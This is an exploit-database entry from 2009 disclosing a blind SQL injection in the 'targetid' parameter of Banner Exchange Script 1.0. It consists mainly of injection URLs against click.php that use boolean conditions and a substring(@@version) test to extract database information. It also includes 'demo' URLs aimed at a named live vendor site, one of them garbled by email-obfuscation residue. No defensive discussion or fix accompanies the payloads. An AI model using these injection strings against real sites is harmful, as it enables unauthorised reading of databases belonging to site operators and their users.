Banner Exchange Script 1.0 (targetid) Blind SQL Injection Vuln

2009-08-07T00:00:00
ID 1337DAY-ID-5627
Type zdt
Reporter 599eme Man
Modified 2009-08-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==============================================================
Banner Exchange Script 1.0 (targetid) Blind SQL Injection Vuln
==============================================================


# [+] Banner Exchange Script 1.0 (targetid) Remote Blind injection SQL
# [+] Software : Banner Exchange Script
# [+] Author : 599eme Man
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special : Moudi my Brozazaaaaaaaaaaaa
# [+] Download : http://www.e-soft24.com/banner-exchange-script-p-367.html
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerabilities
#
#	[+] Blind
#
#		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and 1=1 <= True so the page is redirected
# 		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and 1=2 <= False so the page isn't redirected
#
#		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and substring(@@version,1,1)=4 <= False so the page isn't redirected
#		- http://www.site.com/click.php?hostid=[nr1]&targetid=[nr2] and substring(@@version,1,1)=5 <= True so the page is redirected
#
#			[+] Demo
#
#				- http://www.e-soft24.com/scripts/banner-exchange/click.php?hostid=2&targetid=56%20and%20substring%[email protected]@version,1,1%29=4 <= False so the page isn't redirected
#				- http://www.e-soft24.com/scripts/banner-exchange/click.php?hostid=2&targetid=56%20and%20substring%[email protected]@version,1,1%29=5 <= True so the page is redirected
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################




#  0day.today [2018-04-03]  #